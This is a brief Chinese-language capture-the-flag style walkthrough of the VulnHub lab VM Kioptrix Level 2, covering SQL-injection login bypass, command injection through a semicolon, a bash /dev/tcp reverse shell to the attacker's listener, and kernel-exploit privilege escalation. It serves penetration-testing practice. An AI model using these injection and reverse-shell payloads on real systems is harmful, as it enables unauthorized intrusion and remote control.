主机来源:www.vulnhub.com
下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar
发现IP
安装成功后,查找此虚拟机的IP,我使用的是netdiscover
netdiscover -i eth0 -r 172.21.137.0/24
找到IP为:172.21.137.47
端口扫描
首先去看看80端口
SQL注入
使用万能密码直接登录
命令执行
经典的命令执行
直接分号衔接命令
localhost;whoami
反弹shell
localhost;bash -i >& /dev/tcp/172.21.137.69/8080 0>&1
远程服务器开启监听
弹回shell
但权限不够
提权
我们看下内核版本
uname -a
可以直接用linux2.6的提权
首先自己下下来exp
然后让靶机下载(不直接让靶机下的原因是ssl有问题)
开启http服务
python -m SimpleHTTPServer 9090
下载
编译
执行
结束